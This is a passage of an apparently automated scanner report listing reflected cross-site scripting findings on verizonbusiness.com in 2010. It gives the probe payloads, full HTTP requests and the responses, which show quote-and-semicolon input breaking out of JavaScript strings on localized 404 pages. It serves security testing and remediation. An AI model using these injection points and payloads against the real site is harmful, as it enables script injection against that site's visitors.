Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:31 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47600
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Seite nicht gefunden";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/de/solutions76d60";65d5b6ed1ff/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.497. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /de/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0a65"%3bd9580718d6e was submitted in the REST URL parameter 3. This input was echoed as e0a65";d9580718d6e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /de/solutions/vare0a65"%3bd9580718d6e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 48912
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
h(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Seite nicht gefunden";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/de/solutions/vare0a65";d9580718d6e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.498. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /de/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c3cf'%3b04d6695c844 was submitted in the REST URL parameter 3. This input was echoed as 9c3cf';04d6695c844 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /de/solutions/var9c3cf'%3b04d6695c844/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:37 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 48914
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/de/solutions/var9c3cf';04d6695c844/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.499. http://www.verizonbusiness.com/dk/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /dk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c683a'%3be6c794c75b1 was submitted in the REST URL parameter 1. This input was echoed as c683a';e6c794c75b1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dkc683a'%3be6c794c75b1/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/dkc683a';e6c794c75b1/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.500. http://www.verizonbusiness.com/dk/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /dk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f9e0"%3ba89f9bbbb8d was submitted in the REST URL parameter 1. This input was echoed as 8f9e0";a89f9bbbb8d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dk8f9e0"%3ba89f9bbbb8d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:56 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/dk8f9e0";a89f9bbbb8d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.501. http://www.verizonbusiness.com/es/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /es/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 911eb'%3b3df332fadc4 was submitted in the REST URL parameter 1. This input was echoed as 911eb';3df332fadc4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /es911eb'%3b3df332fadc4/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:43 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47571
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/es911eb';3df332fadc4/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.502. http://www.verizonbusiness.com/es/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /es/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce697"%3b399d83492f5 was submitted in the REST URL parameter 1. This input was echoed as ce697";399d83492f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /esce697"%3b399d83492f5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:17 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47571
Date: Wed, 17 Nov 2010 01:00:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Esta p..gina no existe";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/esce697";399d83492f5/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.503. http://www.verizonbusiness.com/fi/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /fi/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2091"%3bb5b04219c4d was submitted in the REST URL parameter 1. This input was echoed as b2091";b5b04219c4d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fib2091"%3bb5b04219c4d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/fib2091";b5b04219c4d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.504. http://www.verizonbusiness.com/fi/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /fi/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4de9e'%3b16f6b19da21 was submitted in the REST URL parameter 1. This input was echoed as 4de9e';16f6b19da21 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fi4de9e'%3b16f6b19da21/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:58 GMT
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/fi4de9e';16f6b19da21/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.505. http://www.verizonbusiness.com/fr/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /fr/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe08a"%3b6431fabea57 was submitted in the REST URL parameter 1. This input was echoed as fe08a";6431fabea57 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /frfe08a"%3b6431fabea57/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47903
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page introuvable";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/frfe08a";6431fabea57/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.506. http://www.verizonbusiness.com/fr/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /fr/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ee1f'%3bd217fa1bbdd was submitted in the REST URL parameter 1. This input was echoed as 9ee1f';d217fa1bbdd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fr9ee1f'%3bd217fa1bbdd/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47903
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/fr9ee1f';d217fa1bbdd/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.507. http://www.verizonbusiness.com/hk/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /hk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21929"%3be60a51b6d1f was submitted in the REST URL parameter 1. This input was echoed as 21929";e60a51b6d1f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hk21929"%3be60a51b6d1f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:56:23 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/hk21929";e60a51b6d1f/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.508. http://www.verizonbusiness.com/hk/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /hk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 636c6'%3bfffcec4af48 was submitted in the REST URL parameter 1. This input was echoed as 636c6';fffcec4af48 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hk636c6'%3bfffcec4af48/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/hk636c6';fffcec4af48/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.509. http://www.verizonbusiness.com/ie/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ie/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb07b'%3b0ca71a312dd was submitted in the REST URL parameter 1. This input was echoed as eb07b';0ca71a312dd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ieeb07b'%3b0ca71a312dd/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
